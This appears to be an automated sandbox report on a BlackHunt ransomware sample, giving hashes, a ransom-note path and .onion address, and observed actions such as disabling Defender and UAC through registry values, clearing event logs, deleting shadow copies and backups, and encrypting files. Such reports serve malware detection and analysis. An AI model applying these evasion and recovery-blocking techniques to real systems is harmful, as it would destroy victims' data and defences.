Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:18
Static task
static1
Behavioral task
behavioral1
Sample
4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe
Resource
win10v2004-20231215-en
General
-
Target
4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe
-
Size
707KB
-
MD5
57a65ff7caf792b3594baf375484f50c
-
SHA1
9c0138941688f98536f2a876020c746a4fa648f5
-
SHA256
4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c
-
SHA512
de6d563c256cc100de14a7e6f015b7d4af09c5247bd3d280fcad9894bda4152e75f5ca8f263f09ed5e44f9544719784800e41ea1238330ece787c20a16027d98
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1Q8Ivnh:6uaTmkZJ+naie5OTamgEoKxLWT2h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4020 fsutil.exe 896 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3940 wevtutil.exe 3764 wevtutil.exe 3760 wevtutil.exe 5040 wevtutil.exe 4064 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3012 bcdedit.exe 2008 bcdedit.exe 4776 bcdedit.exe 4044 bcdedit.exe -
Renames multiple (2910) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2248 wbadmin.exe 5084 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 4876 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\O: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\V: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\T: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\A: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\G: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\K: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\X: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\M: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\E: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\R: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\P: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\N: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\Y: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\H: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\B: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\I: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\J: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\L: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\Z: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened (read-only) \??\S: 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_ReadMe.hta 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#BlackHunt_ReadMe.hta 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#BlackHunt_ReadMe.txt 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#BlackHunt_ReadMe.hta 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#BlackHunt_ReadMe.txt 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#BlackHunt_ReadMe.hta 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_SelectionSubpicture.png 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#BlackHunt_ReadMe.hta 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#BlackHunt_ReadMe.hta 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#BlackHunt_ReadMe.txt 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#BlackHunt_ReadMe.txt 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\7-Zip\Lang\id.txt 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_SelectionSubpicture.png 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe File created C:\Program Files\Java\jre7\lib\jfr\#BlackHunt_Private.key 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2512 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2384 vssadmin.exe 1272 vssadmin.exe 2724 vssadmin.exe 1748 vssadmin.exe 1580 vssadmin.exe 5116 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4224 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4040 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3396 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Token: SeRestorePrivilege 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Token: SeBackupPrivilege 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Token: SeTakeOwnershipPrivilege 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Token: SeAuditPrivilege 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Token: SeSecurityPrivilege 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Token: SeIncBasePriorityPrivilege 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe Token: SeBackupPrivilege 2880 vssvc.exe Token: SeRestorePrivilege 2880 vssvc.exe Token: SeAuditPrivilege 2880 vssvc.exe Token: SeBackupPrivilege 2888 wbengine.exe Token: SeRestorePrivilege 2888 wbengine.exe Token: SeSecurityPrivilege 2888 wbengine.exe Token: SeSecurityPrivilege 3760 wevtutil.exe Token: SeBackupPrivilege 3760 wevtutil.exe Token: SeSecurityPrivilege 5040 wevtutil.exe Token: SeBackupPrivilege 5040 wevtutil.exe Token: SeSecurityPrivilege 3940 wevtutil.exe Token: SeBackupPrivilege 3940 wevtutil.exe Token: SeSecurityPrivilege 4064 wevtutil.exe Token: SeBackupPrivilege 4064 wevtutil.exe Token: SeDebugPrivilege 4224 taskkill.exe Token: SeSecurityPrivilege 3764 wevtutil.exe Token: SeBackupPrivilege 3764 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2076 wrote to memory of 2148 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 29 PID 2076 wrote to memory of 2148 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 29 PID 2076 wrote to memory of 2148 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 29 PID 2076 wrote to memory of 2148 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 29 PID 2076 wrote to memory of 2484 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 31 PID 2076 wrote to memory of 2484 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 31 PID 2076 wrote to memory of 2484 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 31 PID 2076 wrote to memory of 2484 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 31 PID 2076 wrote to memory of 2832 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 33 PID 2076 wrote to memory of 2832 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 33 PID 2076 wrote to memory of 2832 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 33 PID 2076 wrote to memory of 2832 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 33 PID 2148 wrote to memory of 2088 2148 cmd.exe 35 PID 2148 wrote to memory of 2088 2148 cmd.exe 35 PID 2148 wrote to memory of 2088 2148 cmd.exe 35 PID 2076 wrote to memory of 2248 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 133 PID 2076 wrote to memory of 2248 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 133 PID 2076 wrote to memory of 2248 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 133 PID 2076 wrote to memory of 2248 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 133 PID 2484 wrote to memory of 2508 2484 cmd.exe 38 PID 2484 wrote to memory of 2508 2484 cmd.exe 38 PID 2484 wrote to memory of 2508 2484 cmd.exe 38 PID 2076 wrote to memory of 2532 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 39 PID 2076 wrote to memory of 2532 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 39 PID 2076 wrote to memory of 2532 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 39 PID 2076 wrote to memory of 2532 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 39 PID 2076 wrote to memory of 2596 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 40 PID 2076 wrote to memory of 2596 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 40 PID 2076 wrote to memory of 2596 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 40 PID 2076 wrote to memory of 2596 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 40 PID 2076 wrote to memory of 2660 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 42 PID 2076 wrote to memory of 2660 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 42 PID 2076 wrote to memory of 2660 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 42 PID 2076 wrote to memory of 2660 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 42 PID 2076 wrote to memory of 2760 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 129 PID 2076 wrote to memory of 2760 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 129 PID 2076 wrote to memory of 2760 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 129 PID 2076 wrote to memory of 2760 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 129 PID 2832 wrote to memory of 2632 2832 cmd.exe 46 PID 2832 wrote to memory of 2632 2832 cmd.exe 46 PID 2832 wrote to memory of 2632 2832 cmd.exe 46 PID 2076 wrote to memory of 2528 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 47 PID 2076 wrote to memory of 2528 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 47 PID 2076 wrote to memory of 2528 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 47 PID 2076 wrote to memory of 2528 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 47 PID 2076 wrote to memory of 2352 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 48 PID 2076 wrote to memory of 2352 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 48 PID 2076 wrote to memory of 2352 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 48 PID 2076 wrote to memory of 2352 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 48 PID 2076 wrote to memory of 2440 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 51 PID 2076 wrote to memory of 2440 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 51 PID 2076 wrote to memory of 2440 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 51 PID 2076 wrote to memory of 2440 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 51 PID 2076 wrote to memory of 2428 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 53 PID 2076 wrote to memory of 2428 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 53 PID 2076 wrote to memory of 2428 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 53 PID 2076 wrote to memory of 2428 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 53 PID 2076 wrote to memory of 1096 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 54 PID 2076 wrote to memory of 1096 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 54 PID 2076 wrote to memory of 1096 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 54 PID 2076 wrote to memory of 1096 2076 4e4543da19efa882930094d384f4e8d4313bd5e38ad38f580991139d18337f2c.exe 54 PID 2596 wrote to memory of 2448 2596 cmd.exe 56 PID 2596 wrote to memory of 2448 2596 cmd.exe 56 PID 2596 wrote to memory of 2448 2596 cmd.exe 56 -
System policy modification 1 TTPs 3 IoCs
